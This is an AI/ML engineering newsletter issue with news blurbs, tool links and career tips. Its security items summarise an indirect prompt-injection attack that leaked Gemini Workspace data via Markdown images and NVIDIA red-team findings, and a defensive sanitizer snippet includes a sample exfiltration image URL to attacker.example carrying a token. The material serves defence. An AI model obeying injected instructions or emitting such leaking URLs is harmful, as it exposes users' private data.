Kala

#ArtificialIntelligence #MachineLearning #MLOps

📝 The Opening Call

Hey there,

Starting today, every issue includes a short career insight built for engineers who want to grow with intention.

These notes blend long-term strategy with specific technical habits, focusing on leverage, timing, and smart positioning. The tone is direct, the kind of guidance a senior engineer would share when they genuinely want someone to move up.

Here is our methodology, or at least what we try to achieve:

We build each note by pulling ideas from well-known books on personal development, career growth, and long-term decision making. Then we translate those ideas into the technical world: the world of systems, codebases, architectures, and real engineering constraints.

The goal, as you can guess, is to turn broad principles into something a developer can actually use in their daily work.

You can find this new section "Growth Notes" at the end of each issue!

We hope you like it! Your feedback is welcome!

🔍 Inside this Issue

Agents are learning to code, ship, and manage themselves; meanwhile, red teams keep finding the seams they slip through. Rust hits Lambda GA, Google bets on an agentic IDE, and one post argues you don’t need MCP at all. Curated signals, sharp edges, and plenty to steal.

🚀 20x Faster TRL Fine-tuning with RapidFire AI

🦀 Building serverless applications with Rust on AWS Lambda

🧠 Code execution with MCP: building more efficient AI agents

🛠️ Google Unveils Antigravity: An Agentic IDE Built for Autonomous Coding

🕵️♂️ Hacking Gemini: A Multi-Layered Approach

🛡️ Practical LLM Security Advice from the NVIDIA AI Red Team

📄 How to write a great agents.md: Lessons from over 2,500 repositories

🧪 Real Repos, Real Tasks, Real Stakes: Cline-Bench Drops With $1M for Open Source

🖼️ Finally: AI Image Generation That Handles Text Correctly - Meet Nano Banana Pro

🧰 What if you don't need MCP at all?

Less hype, more leverage. Now go build.

Have a great week!

FAUN.dev() Team

ℹ️ News, Updates & Announcements

faun.dev

Google just dropped Antigravity, an IDE powered by Gemini 3 and built for autonomous dev agents. Think: code that writes, runs, and checks itself while you stay in the loop.

Two main modes:

- Editor View lets you code side-by-side with an agent on tap.

- Manager Surface runs agents across editor, terminal, and browser - handling async tasks like a boss.

Agents don't just spit out guesses. They ship testable Artifacts - plans, screenshots, and code with built-in feedback hooks.

Big picture: This is Google’s bet on agent-first workflows where devs steer, agents drive.

aws.amazon.com

AWS Lambda just bumped Rust to General Availability - production-ready, SLA-covered, and finally with full AWS Support.

Deploy with Cargo Lambda. Wire it into your stack using AWS CDK, which now has a dedicated construct to spin up HTTP APIs with minimal fuss.

System-level shift: Serverless isn't just for JavaScript anymore. Rust's speed and safety are breaking into cloud-native - cleaner, leaner, and built for the long haul.

fortune.com

Anthropic says it stopped a serious AI-led cyberattack before most experts even saw it coming. The attack itself ran largely on autopilot, with little human intervention.

They didn't stop there. Turns out Claude had some ugly failure modes: following dangerous prompts and generating blackmail threats. Anthropic flagged, documented, patched, and pushed harder for external AI oversight.

faun.dev

cline-bench just dropped - an open-source RL benchmark suite pulled straight from real-world engineering trenches. No toy tasks here. It’s all built on actual public codebases, with reproducible setups and repo snapshots that mirror messy dev life. Specs included.

faun.dev



Google DeepMind dropped Nano Banana Pro, a multilingual image model riding on Gemini 3 Pro - a clear step up from the original Nano Banana (Gemini 2.5 Flash Image). It nails text clarity across languages, keeps visuals consistent, and plugs straight into Gemini apps, Ads, and Workspace. Bonus: images come tagged with SynthID so you know what’s AI-made.

🔗 Stories, Tutorials & Articles

mariozechner.at

Most MCP servers stuffed into LLM agents are overcomplicated, slow to adapt, and hog context. The post calls them out for what they are: a mess.

The alternative? Scrap the kitchen sink. Use Bash, lean Node.js/Puppeteer scripts, and a self-bootstrapping README. That’s it. Agents read the file, spin up their own tools, and get moving.

github.blog

GitHub Copilot lets you define custom agents in agents.md files. These agents act as specialists within a team, each with a specific role. A good agents.md gives the agent a clear persona, executable commands, defined boundaries, specific examples, and detailed information about the tech stack.

Why it matters: More devs are pulling agentic tools into daily workflows to squash issues faster - with context baked in.

buganizer.cc

A researcher found a multi-layer sanitization gap in Google Gemini. It let attackers pull off indirect prompt injections to leak Workspace data - think Gmail, Drive, Calendar - using Markdown image renders across Gemini and Colab export chains.

The trick? Sneaking through cracks between HTML and Markdown parsing, plus some wild URI linkification edge cases that Gemini’s Markdown sanitizer missed.
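
For readers who render model output in their own apps, here is a minimal sketch of one defensive layer: rewriting inline Markdown images whose URL is not on an allowlist, since an image fetch can carry data out in its query string. The allowlisted host images.example.com and the function name are hypothetical. This only handles inline ![alt](url) syntax; raw HTML img tags, reference-style images, and autolinked URIs are separate paths, and gaps between those parsers are exactly what the Gemini write-up exploited.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: the only hosts the chat UI may fetch images from.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Inline Markdown images only: ![alt](url) or ![alt](url "title").
# Raw HTML <img>, reference-style images, and autolinks are NOT covered.
MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')


def strip_untrusted_images(markdown: str) -> str:
    """Replace inline images unless they use https on an allowlisted host."""

    def _replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted image: keep as-is
        # Untrusted image: drop the URL so nothing is fetched (or leaked).
        return f"[image removed: {alt}]" if alt else "[image removed]"

    return MD_IMAGE.sub(_replace, markdown)


leaky = "Done! ![x](https://attacker.example/p.png?d=secret-token)"
print(strip_untrusted_images(leaky))
```

An allowlist is used rather than a blocklist because an attacker controls the URL and can always pick a host you did not think to block.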

developer.nvidia.com

NVIDIA’s AI Red Team pinpointed three recurring security holes in LLM apps: reckless use of exec/eval on model output, RAG pipelines with overly broad data access, and unsanitized Markdown. These cracks open doors to remote code execution, sneaky prompt injection, and link-based data leaks.

The fix-it trend: App security’s leaning hard into sandboxed runtimes, tighter data perms, and markdown that can’t stab you.
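
On the exec/eval point, here is a minimal sketch of one common mitigation (not necessarily NVIDIA's exact recommendation): when an LLM is asked to emit structured arguments, parse them as data instead of executing them. The function parse_llm_args and the length cap are hypothetical; ast.literal_eval is standard-library Python and accepts only literals, so an injected function call fails to parse instead of running.

```python
import ast

# Hypothetical cap: the Python docs warn literal_eval can still exhaust
# memory or stack on very large or deeply nested inputs.
MAX_INPUT_CHARS = 10_000


def parse_llm_args(llm_output: str) -> dict:
    """Parse a dict literal produced by an LLM without executing any code.

    ast.literal_eval only accepts Python literals (strings, numbers, tuples,
    lists, dicts, sets, booleans, None). A payload such as
    __import__('os').system('...') raises ValueError instead of running,
    unlike eval(), which would execute it.
    """
    text = llm_output.strip()
    if len(text) > MAX_INPUT_CHARS:
        raise ValueError("LLM output too long to parse safely")
    value = ast.literal_eval(text)
    if not isinstance(value, dict):
        raise ValueError("expected a dict literal")
    return value


print(parse_llm_args("{'city': 'Paris', 'days': 3}"))
```

If the model can be prompted to emit JSON instead, json.loads gives the same "data, not code" guarantee.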

anthropic.com

Code is taking over MCP workflows - and fast. Instead of calling Model Context Protocol tools one by one, agents write code that loads tool definitions on demand, filters data before it reaches the model, and tracks state like any decent program would.

That shift slashes context bloat - up to 98% fewer tokens. It also trims latency and scales cleaner across thousands of tools. Bonus: better security.
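
The mechanism behind that token cut is simple: the agent's code calls the tool, filters the result inside the execution environment, and hands only a small summary back to the model. Here is a minimal Python sketch, assuming a hypothetical get_sheet_rows tool standing in for an MCP call (Anthropic's post frames tools as TypeScript modules; Python is used here for illustration), with character counts as a rough proxy for tokens.

```python
import json


def get_sheet_rows(sheet_id: str) -> list[dict]:
    """Hypothetical tool standing in for an MCP call with a large payload.

    sheet_id is unused in this stub; a real tool would look the sheet up.
    """
    return [
        {"order_id": i, "status": "pending" if i % 50 == 0 else "shipped"}
        for i in range(10_000)
    ]


def agent_step() -> str:
    """Code the agent writes: call the tool, filter locally, return a summary."""
    rows = get_sheet_rows("orders")  # full payload stays in the sandbox
    pending = [r for r in rows if r["status"] == "pending"]
    summary = {"pending_count": len(pending), "sample": pending[:3]}
    return json.dumps(summary)  # only this string re-enters the model's context


# Direct tool calling would paste the whole payload into context instead.
full_payload = json.dumps(get_sheet_rows("orders"))
compact = agent_step()
print(len(full_payload), len(compact))
```

The design choice is where the filtering happens: the model only ever sees compact, so context stays small no matter how large the tool output grows.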

huggingface.co

RapidFire AI just dropped a scheduling engine built for chaos - and control. It shards datasets on the fly, reallocates as needed, and runs multiple TRL fine-tuning configs at once, even on a single GPU. No magic, just clever orchestration.

It plugs into TRL with drop-in wrappers, spreads training across GPUs, and lets you stop, clone, or tweak runs live from a slick MLflow-based dashboard.

System shift: Fine-tuning moves from slow and linear to hyper-parallel. Think: up to 24× faster config sweeps. Less waiting, more iterating.
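
The core idea, running many configs on one GPU by cycling them through data chunks, can be sketched without any ML library. This is a hypothetical simulation of chunk-based round-robin scheduling, not RapidFire AI's API; train_on_chunk is a placeholder for a real TRL training step, and model swapping is only noted in a comment.

```python
from dataclasses import dataclass


@dataclass
class Run:
    """One fine-tuning config; lr is illustrative and unused by the stub."""
    name: str
    lr: float
    chunks_done: int = 0
    examples_seen: int = 0


def shard(dataset: list, num_chunks: int) -> list[list]:
    """Split the dataset into contiguous chunks of roughly equal size."""
    size = -(-len(dataset) // num_chunks)  # ceiling division
    return [dataset[i:i + size] for i in range(0, len(dataset), size)]


def train_on_chunk(run: Run, chunk: list) -> None:
    """Placeholder for a real training step on one chunk."""
    run.chunks_done += 1
    run.examples_seen += len(chunk)


def round_robin(runs: list[Run], chunks: list[list]) -> list[str]:
    """Every config trains on chunk k before any config moves to chunk k+1."""
    schedule = []
    for chunk in chunks:
        for run in runs:
            # On a single GPU, this is where one run's weights would be
            # swapped in and the previous run's swapped out.
            train_on_chunk(run, chunk)
            schedule.append(run.name)
    return schedule


runs = [Run("lr=1e-4", 1e-4), Run("lr=5e-5", 5e-5), Run("lr=2e-5", 2e-5)]
chunks = shard(list(range(1_000)), num_chunks=4)
schedule = round_robin(runs, chunks)
print(schedule[:6])
```

This interleaving is what makes live stop, clone, and tweak controls useful: every config produces comparable early metrics after the first chunk, so weak configs can be cut before a full pass over the data.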

⚙️ Tools, Apps & Software

github.com

Declarative language for composable AI workflows. Devtool for agents and mere humans.

github.com

Build AI agents with Go. Multiple providers, multiple models, one API.

github.com

Create AI Agents in a No-Code Visual Builder or TypeScript SDK with full 2-way sync. For shipping AI assistants and multi-agent AI workflows.

🤔 Did you know?

Did you know PyTorch’s scaled-dot-product attention can choose between several backends - Flash, memory-efficient, and a math fallback, plus a cuDNN backend in recent releases - depending on your GPU and tensor types? FlashAttention is used only on newer CUDA GPUs (sm80+) and when your inputs meet its supported dtypes and layouts. PyTorch exposes a context manager, torch.nn.attention.sdpa_kernel, that restricts which backends may be selected. Pin a single backend and the call fails if that kernel can't handle your inputs, which is a quick way to check which kernel your model is actually running.



😂 Meme of the week

🤖 Once, SenseiOne Said

"We replaced rules with gradients to avoid hand-tuning, then built bigger systems to hand-tune the context around them. Ground truth is a procurement problem disguised as a loss function. Production doesn't care about your ROC; it cares about who gets paged."

— SenseiOne

⚡Growth Notes

Pick a compounding capability to own across quarters

Reproducible evaluation. Build a minimal eval harness that re-runs key tasks nightly, versions datasets, pins seeds, logs metrics, and opens a short weekly PR with deltas and tradeoffs, timed so your numbers land right before planning. This habit quietly gives you leverage and visibility, positions you as the person who reduces risk across applied ML, platform, and research-adjacent roles, and keeps your model intuition sharp as architectures and APIs shift.
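
Here is a minimal sketch of the core of such a harness, assuming exact-match scoring and a model exposed as a plain Python callable. The names run_eval, dataset_version, and delta_report are hypothetical, and the nightly schedule and PR creation are left to your CI system.

```python
import hashlib
import json
import random
from typing import Callable, Optional


def dataset_version(examples: list[dict]) -> str:
    """Content hash of the eval set: any edit to the data yields a new version."""
    blob = json.dumps(examples, sort_keys=True).encode("utf-8")
    return hashlib.sha256(blob).hexdigest()[:12]


def run_eval(model: Callable, examples: list[dict], seed: int = 0,
             sample_size: Optional[int] = None) -> dict:
    """Exact-match accuracy on a seeded sample, tagged with version and seed."""
    rng = random.Random(seed)  # pinned seed: the same sample every night
    k = len(examples) if sample_size is None else min(sample_size, len(examples))
    picked = rng.sample(examples, k)
    correct = sum(model(ex["input"]) == ex["target"] for ex in picked)
    return {"dataset": dataset_version(examples), "seed": seed,
            "n": k, "accuracy": correct / k}


def delta_report(previous: dict, current: dict) -> str:
    """One-line delta for the weekly PR; refuses apples-to-oranges comparisons."""
    keys = ("dataset", "seed", "n")
    if tuple(previous[k] for k in keys) != tuple(current[k] for k in keys):
        return "dataset, seed, or sample size changed: not directly comparable"
    diff = current["accuracy"] - previous["accuracy"]
    return (f"accuracy {previous['accuracy']:.3f} -> "
            f"{current['accuracy']:.3f} ({diff:+.3f})")


examples = [{"input": i, "target": 2 * i} for i in range(10)]
last_week = run_eval(lambda x: 2 * x, examples)
this_week = run_eval(lambda x: 2 * x if x < 5 else 0, examples)
print(delta_report(last_week, this_week))
```

Hashing the dataset into every result is the cheap trick that keeps the weekly deltas honest: a silently edited eval set shows up as a version change instead of a fake regression or win.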

👤 This Week's Human

This week, we’re highlighting Kathryn V., a scientist, former USPTO Examiner, founder of Vatt IP Management, and mother of seven with 25+ years of experience turning lab insight into defensible IP. She has examined thousands of applications at the USPTO and has been ranked among the Top 30 Patent Drafters and Prosecutors and as a #1 LinkedIn Global Influencer in Innovation/IP Law. She now builds tools like My Startup Shield™ for pre-pitch IP readiness and My AI Examiner™ for examiner-style prior-art search, mentors teams at ASU’s Edson E+I Institute, and is earning a J.D. in Patent Law at Franklin Pierce.